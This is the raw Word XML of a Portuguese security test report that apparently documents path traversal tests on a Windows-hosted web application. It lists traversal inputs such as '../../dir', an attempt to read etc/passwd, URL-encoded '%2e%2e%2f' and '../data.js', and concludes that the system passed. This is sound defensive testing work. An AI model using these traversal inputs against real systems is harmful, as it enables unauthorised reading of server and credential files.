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355CB" w14:textId="77777777" w:rsidR="00F15B60" w:rsidRPr="004D4181" w:rsidRDefault="00F15F82" w:rsidP="00A5289A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4.3 RELATÓRIO</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> DE EXECUÇÃO DOS TESTES </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="497EEB3E" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181" w:rsidRDefault="008C6DC7" w:rsidP="00D136D4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Nessa sessão, serão relatados, de forma detalhada, os resultados </w:t>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="pt-BR"/>
        </w:rPr>
        <w:t>obtidos na execução dos testes em cada iteração planejada. Serão apresentados os passos utilizados para detectar possíveis vulnerabilidades, as vulnerabilidades encontradas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e quais danos estas podem causar caso sejam exploradas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25138098" w14:textId="77777777" w:rsidR="00F15F82" w:rsidRPr="004D4181" w:rsidRDefault="00F15F82" w:rsidP="00AC10DC">
      <w:pPr>
        <w:spacing w:line="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83908B4" w14:textId="77777777" w:rsidR="00F3154F" w:rsidRPr="004D4181" w:rsidRDefault="008C6DC7" w:rsidP="00F3154F">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="2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4D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="16663DD9" w14:textId="77777777" w:rsidR="005A089C" w:rsidRPr="004D4181" w:rsidRDefault="005A089C" w:rsidP="0070134C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6B5F70E4" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181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7ACA79" w14:textId="613E8896" w:rsidR="008C6DC7" w:rsidRPr="004D4181" w:rsidRDefault="004236F4" w:rsidP="00E65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4.3.1.1</w:t>
      </w:r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. Tela </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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Path Transversal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB6504F" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181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933C410" w14:textId="6FA47FFB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Tarefa realizada entre os dias </w:t>
      </w:r>
      <w:r w:rsidR="00CE16CE" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>22/03/16 e 23/03</w:t>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/16.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F559BA" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181" w:rsidRDefault="005A089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: 2 horas e 30 minutos. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C800C16" w14:textId="77777777" w:rsidR="00036F84" w:rsidRPr="004D4181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5C87D4" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181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14:paraId="73D38FB4" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181" w:rsidRDefault="001557D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Para identificar a estrutura de diretórios do sistema dentro do servidor, f</w:t>
      </w:r>
      <w:r w:rsidR="00ED7438" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>oi utilizada</w:t>
      </w:r>
      <w:r w:rsidR="0045732E" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00623C1F" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="0045732E" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">funcionalidade </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E158B8" w:rsidRPr="004D4181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E158B8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58B8" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Spider</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E158B8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="0045732E" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="00ED7438" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">a ferramenta </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00ED7438" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Burp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00ED7438"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438" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial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D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ambas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4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>abordadas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no subcapítulo 3.2. </w:t>
      </w:r>
      <w:r w:rsidR="00ED7438" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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Os resultados obtidos, conforme mostra a </w:t>
      </w:r>
      <w:r w:rsidR="00657669" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Figura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2, foram utilizados para executar os testes deste tópico.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163CD55E" w14:textId="77777777" w:rsidR="008A7473" w:rsidRPr="004D4181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6D23D0F" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181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1EE19C6" wp14:editId="165F8544">
            <wp:extent cx="2507141" cy="31718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(Editada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4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2DFC" w14:textId="77777777" w:rsidR="00623C1F" w:rsidRPr="004D4181" w:rsidRDefault="00623C1F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F59E599" w14:textId="0DB9B898" w:rsidR="008C6DC7" w:rsidRPr="004D4181" w:rsidRDefault="009C67EC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>Figura 1</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Resultado mapeamento diretórios do sistema</w:t>
      </w:r>
      <w:r w:rsidR="002D4365" w:rsidRPr="004D418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6CA229B" w14:textId="77777777" w:rsidR="00036F84" w:rsidRPr="004D4181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39E703E" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181" w:rsidRDefault="00846A20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Dada a estrutura hierárquica do sistema descrita na </w:t>
      </w:r>
      <w:r w:rsidR="00657669" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Figura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="00BE4C3F" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2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, o objetivo do teste é utilizar entradas maliciosas na URL para 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conseguir acesso a loca</w:t>
      </w:r>
      <w:r w:rsidR="002D4365" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>is não autorizados a um usuário</w:t>
      </w:r>
      <w:r w:rsidR="00623C1F" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> do 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sistema.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44F5DC" w14:textId="77777777" w:rsidR="002D4365" w:rsidRPr="004D4181" w:rsidRDefault="002D4365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98ABCD" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181" w:rsidRDefault="0048383A" w:rsidP="00FF14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4C0397C3" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181" w:rsidRDefault="008C6DC7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Quando o sistema não consegue efetuar um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, o seguinte parâmetro é exibido na url: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="002D4365" w:rsidRPr="004D4181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4D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs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false.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E1E7D6" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181" w:rsidRDefault="00B959F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A primeira </w:t>
      </w:r>
      <w:r w:rsidR="00623C1F" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="0048383A" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>essão de teste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="007E0AF9" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>fará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uma requisição ao servidor alterando a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="004D4181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citada anteriormente para: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="002D4365" w:rsidRPr="004D4181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proofErr w:type="gramEnd"/>
      <w:r w:rsidR="008C6DC7"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="008C6DC7" w:rsidRPr="004D4181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="008C6DC7" w:rsidRPr="004D4181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="008C6DC7" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>=../../</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008C6DC7"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="008C6DC7" w:rsidRPr="004D4181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4D4181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="008C6DC7" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00DF0646" w:rsidRPr="004D4181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3587C7F9" w14:textId="77777777" w:rsidR="00827015" w:rsidRPr="004D4181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50F5D05" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181" w:rsidRDefault="00284BB3" w:rsidP="00FF140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 xml:space="preserve">O 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comando “</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>../../” foi utilizado para tentar a navegação de forma forçada dentro da estrutura de pastas do sistema operacional do servidor no qual a aplicação está hospedada.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2970602F" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181" w:rsidRDefault="008C6DC7" w:rsidP="00FF140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comando </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00827015" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00827015"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n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cm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o</w:t>
      </w:r>
      <w:r w:rsidR="00BA7CEE" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> sistema operacional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Windows</w:t>
      </w:r>
      <w:r w:rsidR="00827015" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,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serve para listar os arquivos e diretórios dentro da pasta atual.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5726BCF8" w14:textId="77777777" w:rsidR="00827015" w:rsidRPr="004D4181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42C6464" w14:textId="77777777" w:rsidR="00827015" w:rsidRPr="004D4181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36141231" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181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14:paraId="3B0AAEAE" w14:textId="77777777" w:rsidR="00827015" w:rsidRPr="004D4181" w:rsidRDefault="00827015" w:rsidP="00FF140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3DC0AA0" w14:textId="77777777" w:rsidR="00827015" w:rsidRPr="004D4181" w:rsidRDefault="005967D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4B90658E" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181" w:rsidRDefault="00D76012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.</w:t>
      </w:r>
      <w:r w:rsidR="00B959F5" w:rsidRPr="004D4181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14:paraId="7D94D2B9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164F0C0" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181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14:paraId="2874E52C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7888049" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181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4D4181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 ../..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cat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etc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passwd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4D4181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3AAE25F2" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181" w:rsidRDefault="00817857" w:rsidP="0085362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lastRenderedPageBreak/>
        <w:t>O comando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gramEnd"/>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>../../” foi utilizado para tentar a navegação de forma forçada dentro da estrutura de pastas do sistema operacional do servidor no qual a aplicação está hospedada.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F27BF2" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181" w:rsidRDefault="008C6DC7" w:rsidP="0085362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</w:t>
      </w:r>
      <w:r w:rsidR="00817857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comand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cat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etc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passwd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no sistema operacional Linux, serve para listar o conteúdo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passw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(local onde ficam armazenados informações de senha dos usuários). Como o sistema operacional do servidor em questão é Windows, então caso seja executado, o esperado seria um erro. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0289D440" w14:textId="77777777" w:rsidR="00817857" w:rsidRPr="004D4181" w:rsidRDefault="00817857" w:rsidP="0085362D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7CA04CD9" w14:textId="77777777" w:rsidR="00817857" w:rsidRPr="004D4181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2CB12A7B" w14:textId="77777777" w:rsidR="00817857" w:rsidRPr="004D4181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14:paraId="23B76EA7" w14:textId="77777777" w:rsidR="00817857" w:rsidRPr="004D4181" w:rsidRDefault="00817857" w:rsidP="0085362D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4F1CB876" w14:textId="77777777" w:rsidR="00817857" w:rsidRPr="004D4181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1BDD5EC3" w14:textId="77777777" w:rsidR="003164B7" w:rsidRPr="004D4181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.</w:t>
      </w:r>
      <w:r w:rsidR="003164B7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="00544368" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Não foi possível obter o acesso a qualquer outra parte do sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168914CB" w14:textId="77777777" w:rsidR="0085362D" w:rsidRPr="004D4181" w:rsidRDefault="0085362D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EF5AD5" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181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14:paraId="307C61DD" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181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EC335E0" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181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4D4181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=%2e%2e%2f%2e%2e%2f (código equivalente a ../../), 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4D4181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14:paraId="11F69D02" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181" w:rsidRDefault="00830E80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O comando “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../../” serve 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para tentar a navegação de forma forçada dentro da estrutura de pastas do sistema operacional do servidor que hospeda o </w:t>
      </w:r>
      <w:r w:rsidR="007D3513" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sistema explorado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3CF205E8" w14:textId="77777777" w:rsidR="00817857" w:rsidRPr="004D4181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BD96741" w14:textId="77777777" w:rsidR="00817857" w:rsidRPr="004D4181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4E5AF783" w14:textId="77777777" w:rsidR="00817857" w:rsidRPr="004D4181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14:paraId="12D640B2" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181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07CB9EA" w14:textId="77777777" w:rsidR="00817857" w:rsidRPr="004D4181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0BF52A44" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181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.</w:t>
      </w:r>
      <w:r w:rsidR="003164B7" w:rsidRPr="004D4181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14:paraId="57632787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1F0420F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922EF06" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181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ssão de teste </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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14:paraId="5C388E26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0B220E6" w14:textId="77777777" w:rsidR="006C31FD" w:rsidRPr="004D4181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4D4181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=../data.js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para acessar o arquivo “data.js”, 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4D4181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14:paraId="4CA4C9E8" w14:textId="77777777" w:rsidR="006C31FD" w:rsidRPr="004D4181" w:rsidRDefault="006C31FD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68E2A584" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181" w:rsidRDefault="008C6DC7" w:rsidP="0085362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O</w:t>
      </w:r>
      <w:r w:rsidR="00284BB3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="006C31FD" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>comando “</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="006C31FD" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>../” serve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para tentar navegar de forma forçada dentro da estrutura de pastas do sistema operacional do servidor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F4B542" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181" w:rsidRDefault="008C6DC7" w:rsidP="0085362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gramStart"/>
      <w:r w:rsidR="005B5243" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="006C31FD" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ata.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="006C31FD" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>js</w:t>
      </w:r>
      <w:r w:rsidR="004E12C9" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">” é </w:t>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>um arquivo descoberto através do es</w:t>
      </w:r>
      <w:r w:rsidR="004E12C9" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">caneamento realizado pela funcionalidade </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E158B8" w:rsidRPr="004D4181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E158B8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58B8" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Spider</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C8356E" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,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="00284BB3" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>da ferramenta</w:t>
      </w:r>
      <w:r w:rsidR="004E12C9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E12C9" w:rsidRPr="004D4181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4E12C9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E12C9" w:rsidRPr="004D4181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C8356E" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="004E12C9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color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>para mapear a estrutura de pastas da aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BDA8BEE" w14:textId="77777777" w:rsidR="00284BB3" w:rsidRPr="004D4181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A36F2F8" w14:textId="77777777" w:rsidR="00284BB3" w:rsidRPr="004D4181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1913CED7" w14:textId="77777777" w:rsidR="00284BB3" w:rsidRPr="004D4181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14:paraId="27F2D12B" w14:textId="77777777" w:rsidR="00352313" w:rsidRPr="004D4181" w:rsidRDefault="0035231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4F27E7" w14:textId="77777777" w:rsidR="00284BB3" w:rsidRPr="004D4181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5CBA951E" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181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.</w:t>
      </w:r>
      <w:r w:rsidR="003164B7" w:rsidRPr="004D4181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14:paraId="7CF795AF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1364918" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181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>5</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5A9EF48F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F18FFCC" w14:textId="77777777" w:rsidR="006C31FD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4D4181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</w:t>
      </w:r>
      <w:r w:rsidR="005B5243"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./ , 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4D4181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14:paraId="1D19F387" w14:textId="77777777" w:rsidR="002C0836" w:rsidRPr="004D4181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comando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“../../../”  serve para tentar navegar de forma forçada dentro da estrutura de pastas do sistema operacional que hospeda a aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A04149" w14:textId="77777777" w:rsidR="00136AE5" w:rsidRPr="004D4181" w:rsidRDefault="00136AE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9F54CB0" w14:textId="77777777" w:rsidR="006C31FD" w:rsidRPr="004D4181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4D4181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14:paraId="428BB422" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181" w:rsidRDefault="003164B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14:paraId="048A5F09" w14:textId="77777777" w:rsidR="002C0836" w:rsidRPr="004D4181" w:rsidRDefault="002C0836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B6C9836" w14:textId="77777777" w:rsidR="002C0836" w:rsidRPr="004D4181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20183572" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181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lastRenderedPageBreak/>
        <w:t>O sistema passou nos testes</w:t>
      </w:r>
      <w:r w:rsidR="003164B7" w:rsidRPr="004D4181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14:paraId="5BC72A7B" w14:textId="77777777" w:rsidR="00136AE5" w:rsidRPr="004D4181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B5A93F" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181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>6</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
